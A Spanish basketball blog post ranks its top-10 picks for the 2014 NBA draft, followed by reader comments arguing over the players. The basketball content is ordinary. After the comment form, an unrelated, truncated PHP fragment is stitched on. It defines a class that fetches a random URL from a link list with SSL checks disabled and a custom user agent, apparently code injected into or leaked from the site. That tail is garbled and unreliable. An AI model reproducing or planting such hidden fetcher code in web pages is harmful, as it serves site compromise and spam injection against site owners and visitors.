Mock Draft 2014 1.0

20 de January de 2014 por Jose_Dantley

draft2014-mock1

Unos días antes del fin de año hacíamos un ejercicio en retrospectiva sobre el draft 2013. Ahora hacemos algo más difícil, predecir el draft 2014, el de mayor hype de los últimos 10 años, a 7 meses vista. Falta tanto tiempo que nos atrevemos solo con un top-10. Habrá muchísimos cambios. Algunos nombres desaparecerán como un Chris Taft o un Andriuskevicius cualquiera, mientras que otros surgirán de quién sabe qué universidad perdida. Por facilidad supondremos que todos se presentan al draft 2014, pero como siempre, habrá jugadores que preferirán esperar. Esta es nuestra apuesta.

1. Joel Embiid. 7 pies de potencial. Queríamos ser originales pero ya no es ningún tapado y en algunos de los mocks más respetados se nos han adelantado. El center camerunés de Kansas es la gran sorpresa del año. No voy a entrar en el error de compararlo con cierto pivot que frecuentaba el Cotton Club -Montes dixit- porque me parece una exageración, pero juzgad por vosotros mismos. Atentos sobretodo a su movimiento en la jugada del 1:09 del vídeo:

Bajo la tutela de Bill Self, la curva de aprendizaje del Embiid es demoledora. No es particularmente explosivo pero todo lo demás grita “All Star”. Promedia solo 10.9 puntos, 7.4 rebotes, 2.6 tapones, pero en apenas 22 minutos de juego y con casi un 70% de efectividad. A final de temporada esos números serán mucho mejores. En estos momentos no es un número 1 fijo ni mucho menos, pero la tendencia apunta a que puede llegar a ser indiscutible.

2. Jabari Parker. Enorme jugador. Debería estar ya en la NBA y lo haría de titular indiscutible de la gran mayoría de los equipos. No está clara su posición aún. Es un 4 en la NCAA, pero pudiera tener que jugar de 3 en la NBA por razones físicas, lo cual nos lleva a una de sus debilidades: ¿realmente tiene una posición en la NBA? ¿tendrá dificultades en defensa con 4 poderosos o 3 rápidos? Por lo demás, lo hace todo. Las comparaciones con Carmelo Anthony son absurdas. En este sentido, Jabari Parker tiene más de Kukoc -quizá de aquel Kukoc pasado de peso-. Es capaz de subir la bola como un base, tirar como un escolta, rebotear como un 4 e incluso tiene movimientos de center puro. 6’8″ es su estatura oficial.

En el lado negativo, el bajón de rendimiento de los últimos partidos, justo cuando las defensas han sido más duras, ¿alerta roja?, creemos que no. Sus números son muy buenos en Duke, incluso con los últimos malos partidos: 18.8 puntos, 7.3 rebotes. Para mí la duda no es si Jabari Parker es una estrella, sino en qué nivel lo situamos en el actual escalafón NBA. Y acabamos con una alerta más que quizá le haga perder algún puesto: es mormón y con alma de misionero. Ha sugerido que quizá dedique una año a predicar su fe.

3. Andrew Wiggins. ¿To hype or not to hype? Hamlet dudaría hasta la locura. Wiggins sigue siendo el jugador con un techo más alto pero sus 15.8 puntos y 6.3 rebotes saben a poco. De momento deja destellos pero también dudas. Es demasiado pronto para pensar que pueda ser el Shabazz de este año, más que nada porque sí ha demostrado no cebarse en ser el macho alfa a costa de perjudicar a su equipo, pero sí es cierto que elegirlo como número 1 es más arriesgado de lo que parecía hace unos meses. En el lado positivo, parece aplicarse en defensa y esta misma semana capturó 19 rebotes en un partido. Es mucho más que un simple anotador.

4. Julius Randle. Claro ejemplo de power forward de toda la vida. 6’9″, buena movilidad, buenos movimientos, instinto reboteador y un tiro aceptable. Promedia 16.9 puntos y 11.4 rebotes, con unas más que respetables 1,8 asistencias por partido. La alerta roja viene de la defensa. En 16 partidos, ha robado el balón 3 veces. No 3 robos de media, no. 3 robos en más de 8 horas de juego efectivo. ¿Será Randle un “hacenúmeros” en la NBA o podrá ser un jugador franquicia?

5. Marcus Smart. Hizo lo que nadie se atrevía a hacer: dejar un draft mediocre para meterse en la boca del lobo del draft 2014 y ser mejor jugador. Parece que lo está consiguiendo. Ha mejorado su tiro (aunque no llega todavía a ser bueno) pero no acaba de ser un base distribuidor. La eterna duda de si un base anotador puede llevar a su equipo a lo más alto estará en el lado negativo de su evaluación. Su buena defensa y su actitud estarán en el lado positivo. 17.8 puntos, 5.4 rebotes, 4.1 asistencias, 2.5 robos a día de hoy.

6. Dante Exum. El australiano aún tiene que tomar la decisión de si pasa unos meses en la NCAA o ignora por completo la universidad y se dedica estos seis meses a mejorar aspectos clave como el tiro, bien sea en la liga australiana o incluso en solitario. ¿Mejorarían sus opciones de ser top-5 si queda oculto? ¿Es un riesgo jugar estos meses y quedar expuesto? De momento lo que sabemos es que en el baloncesto FIBA, Exum hizo barbaridades en las selecciones inferiores. Su físico y su velocidad se impusieron a los jugadores de similar edad. Estaremos a la espera de su decisión.

7. Zach Lavine. Un guard que actualmente es escolta pero podría intentar la transición a playmaker. Tiene poco cuerpo, no en altura (6’5″) pero sí en corpulencia. Buen tirador, toma buenas decisiones, pero no sabemos si es capaz de llevar el peso del equipo porque en UCLA no es primera espada. Quizá es pronto para ponerlo tan arriba sin haber probado nada. Digamos que son gustos personales en una lista bastante personal. De todas maneras, deberá subir esos 12.4 puntos de media para tener opciones al top-10

8. Dario Saric. En la Cibona es el jefe. Ser el jefe en un equipo profesional de nivel a los 19 años no lo puede decir ningún otro candidato. El croata hace de casi todo. El casi es el tiro exterior. Gran pasador, reboteador y penetrador en el pasado Eurobasket nos dejó alguna duda, principalmente en defensa. Es difícil compararlos con el resto pero no debería caer fuera de lotería. Actualmente es candidato a MVP en la Liga Adriática donde promedia 16 puntos y 8 rebotes, mientras que en la competición menor europea está en números ligeramente inferiores.

9. Noah Vonleh. Vonleh es un 4 defensivo con gran físico (6’10”) y potencial de mejora en ataque. Promedia 12 puntos y 9 rebotes. Puede ser lotería simplemente por conseguir esas cifras reboteadoras y esa gran consistencia en defensa siendo un recién llegado.

10. Doug McDermott. McDermott no pertenece al top-10. Al menos eso piensan todos los mocks y quizá todos los GM. Con la única duda de Jabari Parker, McDermott es claramente el mejor jugador de la NCAA. El senior de Creighton presenta unos números demoledores: 25.2 puntos, 7’2 rebotes y porcentajes algo menores a otros años, pero que aún así llegan al mítico 50/40/90%. Pero también Tyler Hansbrough era el mejor, como lo fue Morrison y por razones distintas ninguno ha triunfado. En defensa puede ser un gran agujero -3 tapones para un 6’8″ y 5 robos tras 17 partidos-, pero no sería el primero que con carencias defensivas da 15 minutos ofensivos que levantan un partido. Me resisto seriamente a dejar a McDermott fuera de lotería.

Se queda fuera de la lista Aaron Gordon, del cual tenemos muchas dudas. 6’8″ para un power forward puede ser algo corto y vemos inviable que pueda llegar a ser un 3 solvente. No es buen tirador -no llega al 50% en tiros libres- ni tiene movimientos depurados en ataque. Lo que sí tiene es mucha potencia y mucho corazón, que le dan para 12 puntos y 7’6 rebotes en 30 minutos. No parece que le para ser el próximo Blake Griffin.

Siguientes en la lista: James Young, Rodney Hood, Glen Robinson, Gary Harris, Mario Hezonja, Willie Cauley-Stein, Wayne Selden.

Mención “¿soy el próximo Podzolkine o el próximo Shawn Bradley?”: Mamadou Ndiaye. 7’6″ de africano que promedia 3’5 tapones y un 74% en tiros de 2.

Mención “mi nombre mola”: Le’Bryan Nash. Compañero de Marcus Smart con buenos números. Su best case scenario es una mezcla entre LeBron James, Kobe Bryant y Steve Nash. No creemos que llegue a tanto pero no me extrañaría verlo como segunda ronda.

Comenta

26 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran articulo. Al final, las posiciones también estará determinda por el orden de elección de los equipos. Es decir, si los Bucks elijan primero, teniendo a Henson y Sanders, lo más normal sería que apostasen por un exterior en vez de por Embiid. Es curioso, pero en este “gran” Draft, el único perro grande que hay es Embiid y si me apuras Cauley-Stein que no debería entrar en el Top 15. En ese sentido, no tiene competencia por puesto, como si lo pueden tener Parker y Wiggins entre sí, en ese sentido.
    Tal y como dije el otro día, mi orden sería, 1-Parker, 2-Embiid, 3- Smart, 4-Randle, 5-Exum. Wiggins me parece un sobrevalorado de cojones, y el cuello largo Vonleh me gusta. McDermott creo que será un top 12 fijo, aunque no tenga físico ni defensa, una metralleta siempre es buena tenerla.

      Citar

  2. Denise dice:
    #2

    Y a nivel europeo espero ver al italiano Sandro Gentile en primera ronda.

      Citar

  3. Blade Petrovic dice:
    #3

    Gran artúculo pero una cosa que me parece a mí es que aqui no solo se elige por números, sino por potencial, porque sino algunos bajarían bastantes puestos no?

      Citar

  4. Melo15 dice:
    #4

    Denise creo que infravaloras a Wiggins. Es verdad que no esta respondiendo a todas las expectativas pero aun asi es un especimen fisico de cuidado y aunque ea verdad que esta un poco verde en general, para mi su unico problema es que se desconecta del partido.
    Aun asi, creo que Embiid y Jabari son los mejores con diferencia, seguidos por Smart, Wiggins y Randle, bo me fio de Exum.

    Dantley, para mi las comparaciones de Parker con Carmelo son bastante acertadas aunque lo veo mad parecido a Pierce. Pero como dices arriba, ambos son aleros que juegan de 4, fuertes, que juegan en el poste y que se crean au tiro. Ademas de no ser buenos defensores.

    En definitiva, uno de los mejores Drafts de los ultimos años ya que abundan las superestrellas.

      Citar

  5. Denise dice:
    #5

    Melo15:
    Denise creo que infravaloras a Wiggins. Es verdad que no esta respondiendo a todas las expectativas pero aun asi es un especimen fisico de cuidado y aunque ea verdad que esta un poco verde en general, para mi su unico problema es que se desconecta del partido.
    Aun asi, creo que Embiid y Jabari son los mejores con diferencia, seguidos por Smart, Wiggins y Randle, bo me fio de Exum.

    Pero si crees que todos éstos son a dia de hoy mejores que Wiggins, me estás dando la razón.

    A ver, yo de Wiggins he visto 3 partidos y no me ha gustado lo que he visto de él, quizás me han pillado 3 malos partidos suyos. Por supuesto no digo que sea un paquete ni mucho menos, cuando hablo de sobrevalorado, lo digo porque no entiendo cómo llevo los últimos 2 años hablando de este tio como indiscutible número 1 del Draft escuchando incluso comparaciones con Lebron. Ahora en los mocks está bajando y no me extraña, yo me esperaba en Wiggins ver a un jugador franquicia que liderase a su equipo y lo que me he encontrado es un tio que ayuda algo en la anotación, en el rebote y defiende, pero para nada ejerce el rol de killer ofensivo, al reves, me ha parecido un mero jugador de equipo.
    Los analistas que lo ponen por las nubes entenderán de basket mas que yo, y le habran visto jugar muchos mas partidos, por lo que quizas mi analisis de él sea erroneo y sesgado, pero si fuese GM, a dia de hoy escojo a Parker, Smart, Randle y Embiid por delante suya.

      Citar

  6. Denise dice:
    #6

    Y a todo esto….veremos si Parker y Exum se presentan al Draft.
    Tendría gracia como estan tankeando un montón de equipos y que ahora los Wiggins, Parker, Exum y cia no se presentansen al Draft.

      Citar

  7. Sancho88 dice:
    #7

    Bueno, interesante el artículo de los melones, jejej. Yo este año estoy descubriendo la NCAA. Precisamente ahora acabo de ver a Kansas contra Baylor. Muy bien Wiggins, por cierto, y en Baylor muy bien Cory Jefferson. Lo ponen en tercera ronda pero por cómo lo he visto creo que va a subir más de un escalón.

    Sobre el top 10, que es lo que debatimos hoy aquí, la cosa está muy reñida y es imposible predecir quién de estos será el próximo jefe de la liga. Porque lo que es indiscutible es que sí parece el mejor draft desde 2003, que al menos debe estar al nivel del 2009, y yo creo que por potencial superarán a los Evans, Rubio, etc., Y eso, la pregunta es quién de estos diez tíos será el mejor.

    No sé si a propósito o no, hay jugadores que se han quedado en el tintero. Gary Harris, por ejemplo, que puede ser un Monta Ellis. Después no se sabe. Lo mismo Shabazz Napier acaba siendo rookie del año, porque esto es imprevisible, pero por sensaciones ahora mismo Joel Embiid es el mejor jugador de esta generación. En poquísimos minutos está haciendo números muy buenos gracias a su inteligencia posicionándose en ataque y en defensa. Está claro que cuando Embiid está en la cancha las órdenes de equipo van claramente a jugar para él, y cuando éste se sienta ya aparecen más jugadas para Wiggins. Por los cuatro partidos que he visto de Kansas, yo diría que Wiggins no es ni la super estrella que decían que iba a ser, ni por supuesto un Shabazz Muhammad de la vida. Eso ni de coña. A mí se me asemeja mucho más con Paul George, y de hecho esa es la comparación que están haciendo últimamente en Nbadraft.

    Digamos que el juego de Wiggins pasa por ser un gran jugador de equipo que defiende con mucha inteligencia, con gran salto vertical para ir a por el rebote y que sabe buscar buenas penetraciones a canasta jugando el 1×1, además de forzar muchas faltas. Pisa mucho la línea de libres. Tampoco es que deslumbre en ataque, no es un jugador como Parker que pueda anotar en cualquier circunstancia y posición, pero sí que poco a poco el partido va pasando y Wiggins va sumando números. Tiene el cuerpo perfecto para jugar en la NBA, y parece que la cabeza también la tiene en su sitio. Hay muchas dudas con su lanzamiento exterior, pero en juego en transición, defensa, y aprovechando buenos bloqueos es un jugador muy capaz de desequilibrar un partido a favor de su equipo. En la medida que se convierta en un lanzador fiable y confíe más en su 1×1 estamos hablando del próximo Paul George. Yo creo que ese es su techo, al igual que veo a Parker como un Rudy Gay. Pero sí veo a Embiid convirtiéndose en el perro grande jefazo de la liga. Ese sí que lo tiene absolutamente todo. Es una máquina perfecta. No sé si será el próximo Akeem, pero está claro que va a ser alguien muy importante en la liga.

    Así mi top 3 coincide ahora mismo con el de Jose por todo lo que he explicado: Embiid, Parker y Wiggins.

    Para mí top 4 sería Exum si se deja ver en la NCAA, y si no claramente Marcus Smart. Yo sigo pensando que este tío va a rendir mucho más como escolta que como base, pero parece que en todos los sitios especializados aparece como base… puede ser un MCW desde el primer día. Se va a hinchar a hacer estadísticas.

    Número 5 para Randle. Aquí difiero contigo en que creo que Smart es mejor jugador que Randle. Lo bueno de Randle es que no es un tronco. Sabe botar, sabe driblar y aprovecha muy bien su superioridad física cerca de canasta. Lo malo es que en la NBA hay que tener lanzamiento a 4 metros, o al menos amenazar desde ahí como algo más o menos habitual, y parece que Randle no amenaza desde ahí. Hombre, se puede trabajar. A Griffin le ha costado unos 4 o 5 años empezar a enchufarlas desde media distancia, pero ahora las mete y ya es una amenaza constante desde cualquier sitio prácticamente. No sé, tengo reticencias con Randle, pero sí que es el mejor ala-pívot del draft

    Número 6 Exum si sigue en Australia, como ya digo sería 4 para mí si fuera a la NCAA, y a partir del 6 no me cuadra este mock. Ni LaVine ni Saric deberían salir tan arriba. Saric es un jugador FIBA con todas las de la ley, no le acabo de ver en la NBA, Y LaVine lo msimo puede ser Klay Thompson en su best case que ser un Austin Rivers de la vida, y a mí me pinta más a lo segundo que a lo primero. Yo me mojo y digo que el jugador número 7 debe ser Aaron Gordon. Con un poco más de aprendizaje en el juego ofensivo podría ser mejor que Randle quizá, y por potencial le veo muy por encima de LaVine y de Saric.

    A partir del 7 todo puede pasar. Para mí los cracks son Embiid, Parker, Wiggins, Smart, Randle, Exum y Gordon, y en los demás ya no veo esa cualidad de futura estrella. Creo que Gary Harris debería ser número 8 sí o sí, y a LaVine lo bajaría al 9 quizá, con Rodney Hood en el 10. 11 para McDermott (acojonante lo de este chaval, que tiene el hándicap de ser un jugador de tercer año), Vonleh con el 12 (un típico 10-10 a lo Aminu o Faried, una cosa así como mucho), y después bases como Ennis o Clarkson. Muchas dudas me generan Young, Cauley-Stein, Jerami Grant (sobrino del gran Horace Grant), y desde luego Glen Robinson. SI sale Robinson top 15 entonces es que no tengo ni idea de basket…

    Ese sería mi mock. De la lotería en adelante a mí me gusta mucho Adryan Payne de los Spartans, Napier como ya he comentado, odio a Russ Smith (un Ben Gordon de la vida) y poco más que comentar. Cuando lleven un par de semanas de liga diremos que esto no era para tanto, que vaya banda de paquetes, que si el único que rinde es fulanito o menganito, bla bla bla bla. En realidad no tenemos ni puta idea. La NCAA es lo que es, los vendehumos de ESPN son los que son y Olowokandis, Milicics, Kwames Browns y Anthonys Bennetts hay muchos, pero Olajuwones, Scotties Pippens, etc. solo hay un caso por barba en toda la historia de la NBA. Por tanto no esperemos una generación como la de 2003, pero seguro que sí van a ser la mejor generación de esta década.

    Joel Embiid jugón!!

      Citar

  8. rumbero dice:
    #8

    Gran artículo para los que no estamos tan al día con la NCAA. A Parker lo vi hace unas semanas contra E Michigan y me pareció un talentazo ofensivo de los grandes. Veremos donde porque aquí el hype de unos y otros
    varia en cuestión de meses/semanas, pero no debería bajar del top3. A Exum lo recuerdo precisamente de ese partido que sale en el vídeo contra España sub-19 y fue una jodida barbaridad. Metió más de 30 puntos e hizo lo que le dió la real gana, otra cosa es esperar que también lo haga con los “mayores”.
    Le’Bryan Nash! jaja No se puede tener un nombre que mole más. A este tío lo quiero para la hoops de la temporada que viene

      Citar

  9. Jose Luis dice:
    #9

    rumbero:
    Le’Bryan Nash! jaja No se puede tener un nombre que mole más. A este tío lo quiero para la hoops de la temporada que viene

    xDDDDD

      Citar

  10. Dantley dice:
    #10

    Blade Petrovic:
    Gran artúculo pero una cosa que me parece a mí es que aqui no solo se elige por números, sino por potencial, porque sino algunos bajarían bastantes puestos no?

    La gran mayoría será elegido por potencial, salvo que haya algún equipo que necesite algo concreto ya hecho. Si fuera por números McDermott sería el 1 fijo.

    Melo15:
    Dantley, para mi las comparaciones de Parker con Carmelo son bastante acertadas aunque lo veo mad parecido a Pierce. Pero como dices arriba, ambos son aleros que juegan de 4, fuertes, que juegan en el poste y que se crean au tiro. Ademas de no ser buenos defensores.

    No sé, he visto bastante a Parker, quizá el que más, junto con obviamente Hood, y me parece mucho más completo que Melo, pero de momento, con menos instinto.

    En líneas generales tengo una gran duda con la parte de arriba del draft. Veías a Anthony Davis y le veías ambición, mientras que ves a Parker, Wiggins o Randle y hay talento, pero es como si no se quisieran comer el mundo. Por ese lado, Smart los adelanta a todos.

      Citar

  11. Melo15 dice:
    #11

    Bueno ya veremos como se va deserrollando la temporada y como responde cada uno en el March Madness.
    De momento al unico que veo demasiado frio sobre la pista es a Wiggins.
    A Randle los partidos que le he visto siempre me ha parecido un jugador muy agresivo sin balon, siempre buscando tener la bola.
    Aunque sin duda Smart es el que tiene mas caracter.
    No veis a Smart mas escolta que base? Yo creo que no tiene cualidades para ser base, al igual que Exum, no entiendo porque la NBA tiene esta mania de convertir a SG en PG.
    El que me gusta mucho es Vonleh, tiene unas condicines fisicas inigualables y si mejora el tiro puede convertirse en una estrella en esta liga.

      Citar

  12. Melo15 dice:
    #12

    Alguien conoce a Chris Walker? Aun no ha debutado con Florida, pero lo vi el año pasado en el McDonalds All American y me parecio un talentazo.
    Y de momento los dos grandes fracasos son los gemelos Harrison, que piensas de ellos Dantley?

      Citar

  13. Dantley dice:
    #13

    Melo15:
    Alguien conoce a Chris Walker? Aun no ha debutado con Florida, pero lo vi el año pasado en el McDonalds All American y me parecio un talentazo.
    Y de momento los dos grandes fracasos son los gemelos Harrison, que piensas de ellosDantley?

    No lo he visto jugar. Se habla bien de él, pero habrá que esperar que resuelva sus temas.

    De los Harrison, lo que dices, fracaso. Además es que los ves jugar y personalmente, no veo nada que me lleve a pensar que van a dar más de sí. Ahora mismo dudo incluso que sean primera ronda. Están en Kentucky, algo más deberían hacer.

    El que me tiene un poco en duda es James Young también de Kentucky. No le entra, pero no sé, me da la impresión de que puede haber jugador.

      Citar

  14. Simon dice:
    #14

    Lo más gracioso de todo es que los últimos rumores y declaraciones de algunos jugadores como Embiid o Parker apuntan a que permanecerán un año más en la universidad y se declararan elegibles para 2015. En el caso de Parker no he leído ningunas declaraciones suyas pero por lo que dicen los Managers de la NBA lo tienen claro. Por otro lado en el caso de Embiid ha sido el propio pívot el que ha dicho que no se ve preparado para dar el salto a la NBA y prefiere esperar un año más y formarse mejor. Al parecer aún no domina con soltura el inglés ni está totalmente adaptado a la vida en EEUU. Veremos que pasa pero si se confirman estas dos cosas sería decepcionante que la espectacular clase de 2014 que llevan vendiéndonos tanto tiempo se quedara sin sus dos mayores perlas.

      Citar

  15. Dantley dice:
    #15

    Simon:
    Lo más gracioso de todo es que los últimos rumores y declaraciones de algunos jugadores como Embiid o Parker apuntan a que permanecerán un año más en la universidad y se declararan elegibles para 2015. En el caso de Parker no he leído ningunas declaraciones suyas pero por lo que dicen los Managers de la NBA lo tienen claro. Por otro lado en el caso de Embiid ha sido el propio pívot el que ha dicho que no se ve preparado para dar el salto a la NBA y prefiere esperar un año más y formarse mejor. Al parecer aún no domina con soltura el inglés ni está totalmente adaptado a la vida en EEUU. Veremos que pasa pero si se confirman estas dos cosas sería decepcionante que la espectacular clase de 2014 que llevan vendiéndonos tanto tiempo se quedara sin sus dos mayores perlas.

    Smart tuvo mucho valor, pero si tiene una lesión de por vida, se acabó todo, tendrá que vivir como cualquiera, buscándose la vida, frente a vivir como un millonario. Si Nerlens Noel no vuelve a jugar, ya es millonario y le queda pensión NBA. Una buena gestión de dinero y vida resuelta.

    Lo que quiero decir es que el riesgo es demasiado y no muchos están dispuestos a asumirlo. No creo que ningún top-5 se arriesgue. El único del que dudaría es de Parker por esos temas religiosos que comentaba.

      Citar

  16. Viva_Dirk dice:
    #16

    Comento jugador por jugador, para no dejarme nada.

    Embiid: Para mi haría bien en quedarse otro año en la uni, pero claro si te dicen que sales seguro top5 es casi imposible decir que no a esa cantidad de dinero. Contando con que se presente veo difícil que sea Nº1 por varios motivos, el principal es que los que actualmente son los 6 peores equipos de la NBA tienen mejor cubierto el puesto de center que casi ningún otro, y la segunda es que no es un draft cualquiera, Parker y Wiggins llevan años siendo muy buenos y Embiid hace 3 años no sabía casi jugar, y Smart tiene la ventaja de que escasean los escoltas que para mi es lo que es. No me fio de un pivot freshman salvo que sea talento puro o unos físicos brutales, y aun siéndolo tardan mucho en rendir si es que llegan a hacerlo. Para mi pick3 o pick 4.

    Parker: Salvo unos meses finales brutales de algún otro lo veo pick1 seguro. Bucks, Sixers, Jazzs o Magics necesitan un anotador exterior, y si pinta a estrella de las buenas mejor aun. Lo veo como Jose hablando de su estilo de juego, pero para mi si es un alero, quizá cuando vaya perdiendo explosividad pueda reciclarse en un cuatro pero falta mucho para eso.

    Wiggins: Personalmente no me estoy llevando decepción alguna, no porque hubiese visto un solo partido suyo, sino porque siempre se ha hablado de el como un jugador total, la comparación era con Pippen así que no esperaba verlo mentiendo 25 por partido. Lo que he visto confirma que es un jugador muy solidario, con un tremendo físico y capacidades para ser un jugador de época. Verlo mas abajo del pick 2 me sorprendería mucho, yo no lo dejaría pasar.

    Smart: Si lo ponen de base no tengo nada clara su adaptación a la liga, ningun base anotador ha llevado lejos a sus equipos y hay buenos bases en casi todos los equipos. De escolta si puede ser un killer, sus penetraciones son mortales y no es un megachupón. Pick 3 o 4.

    Randle: Me gustan los jugadores interiores que saben atacar el poste bajo, no abundan y este lo hace muy bien. La comparación con Zach Randolph me parece buena, tiene mas físico y menos rango de tiro. Creo que hará números nada mas pisar la liga…pero eso pensaba de Thomas Robinson, la verdad es que no puede jugar con un center de los que no se mueven de la pintura, hay pocos entrenadores que aprovechen dos tios netamente interiores. Pick 5.

    Exum: No tengo ni idea de lo que sabe hacer, guiarse por campeonatos sub19 es pegarse un tiro en el pie. Aun asumiendo que sea bueno vuelvo al argumento de Embiid, salvo Orlando o Lakers el resto de equipos de abajo tienen bases titulares consolidados. Parece que no bajará del 6 pero no me atrevo a decir nada.

    LaVine: Como a Jose también me gusta, mi duda es si puede pasar rápidamente a ser un base que es donde mayores estragos podría hacer, jugadores de su estilo que lo hicieran se me ocurre Curry, pero estuvo varios años en la universidad. Otro que me gustaría verlo mejor en 2015. Talento y atrevimiento tiene de sobra para triunfar, pero un salto prematuro podría hacer que tarde mas en ello, o se quede en un jugador de rol limitado. Si se presenta lo veo fuera del top10.

    Saric: Jugón donde los halla, no necesita lanzar a canasta para ser determinante y eso es muy escaso en la liga. Me preocupa que se le pueda ningunear si el vestuario no es muy propicio, pero si encaja donde sea seleccionado será un jugador de élite en poco tiempo. Lo veo algo mas bajo del 8, aunque no mucho.

    Vonleh: Por lo que veo y leo en todos sitios me parece el jugador infravalorado del draft. Para ser un ala-pivot es grande, tiene un rango de tiro amplio, ciertos movimientos en el poste y un manejo de balón aceptable, salvo que sea un auténtico pasota, y no lo parece, no entiendo porque no aparece mas arriba. No lo veo mas abajo del 8.

    McDermott: No cabe duda de que sabe jugar a esto, en ataque es un gran talento y eso cuenta. Creo que estará mas abajo, me cuadra para que lo elija Memphis o alguno de los equipos con 2 picks altos en su segunda elección.

    Aaron Gordon: Coincido con Jose en que le falta mucho para ser algo cercano a Griffin, es el jugador al que mejor le vendría otro año en la universidad, siendo una estrella en su equipo y acostumbrandose a anotar de algún modo que no sea machacando. Aun así si se presenta creo que será Top10, es un jugador de los que vende y en realidad si tiene ganas de ser un buen jugador lo será.

    En el grupo de me gusta: Gary Harris-Rodney Hood-Wayne Selden

    En el grupo de no me gusta: Cauley Stein-James Young

    Jugadores de mas abajo ya comentaremos mas adelante…o no, que las fantasys son muy malas para abrir demasiado la boca, jeje.

      Citar

  17. Sancho88 dice:
    #17

    Wayne Selden, uno de esos tíos que sí tiene ganas de comerse el mundo. Va sobrado de energía. El otro día contra Baylor se tiró a la grada a por el balón, a la segunda o tercera fila, y salvó la acción, que terminó en canasta fácil para Embiid. Enorme

      Citar

  18. txusma dice:
    #18

    Sancho88:
    Wayne Selden, uno de esos tíos que sí tiene ganas de comerse el mundo. Va sobrado de energía. El otro día contra Baylor se tiró a la grada a por el balón, a la segunda o tercera fila, y salvó la acción, que terminó en canasta fácil para Embiid. Enorme

    Eso tb lo hacía yo en mis años mozos y no vino ninguna franquicia NBA a draftearme. 😀

    Aparte de las ganas como va de calidad? Parece que tb tiene un techo muy alto y q va mejorando según avanza la temporada.

      Citar

  19. rumbero dice:
    #19

    Supongo que ya lo habréis leído, pero los forraos de Warren Buffet y Dan Gilbert dan 1 billón de dolares para el que complete correctamente todo el bracket de la March Madness. Así que los que controláis el tema ya sabéis, tenéis una posibilidad entre…¡¡9,2 millones de billones!! Os podriáis comprar los Bucks e ir de Prokhorovs de la vida

      Citar

  20. Viva_Dirk dice:
    #20

    Y donde hay que ponerlo para que sea oficial y aspirar al premio?

      Citar

  21. rumbero dice:
    #21

    Viva_Dirk:
    Y donde hay que ponerlo para que sea oficial y aspirar al premio?

    Nada…acabó de leer que hay que ser ciudadano americano para poder participar. Los registros se abren el 3 de marzo.

    http://finance.yahoo.com/news/quicken-loans-billion-dollar-bracket-130000336.html

      Citar

  22. Melo15 dice:
    #22

    Alguien sabe una buena web para ver partidos sin descargarselos de la NCAA?
    Esque yo se una pero hay que descargarselos…

      Citar

  23. Denise dice:
    #23

    Melo15:
    Alguien sabe una buena web para ver partidos sin descargarselos de la NCAA?
    Esque yo se una pero hay que descargarselos…

    En directo? Rojadirecta ó googleas los nombres de los equipos + live y ya te salen unas cuantas.

      Citar

  24. Lucho dice:
    #24

    Una pequeña correccion: 1 billion NO es un billon. Significa 1000 millones, que igual es bastante jaja

      Citar

  25. Ruxixon dice:
    #25

    ¿¿¿Hay que ser americano???vaya mier…pues les va a salvar eso xDD

    Ayer empecé a leer una ristra de comparaciones sobre las probabilidades de acertarlo todo.Es 1 entre 9,223,372,036,854,775,808 en “cristiano” 9,2 quintillones (¿existe eso?).Es más probable hacer 4 hoyos en 1 golpe en golf o que pares a una persona por la calle y ésta haya pisado la luna.Alucinante

      Citar

  26. Blade Petrovic dice:
    #26

    Una cosita, alguien me puede comentar como le va al hijo del gran Manute, tenía entendido que ya pasa los 2 metros y que parece ser que el chico no es manquillo. Llegará a la NBA?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>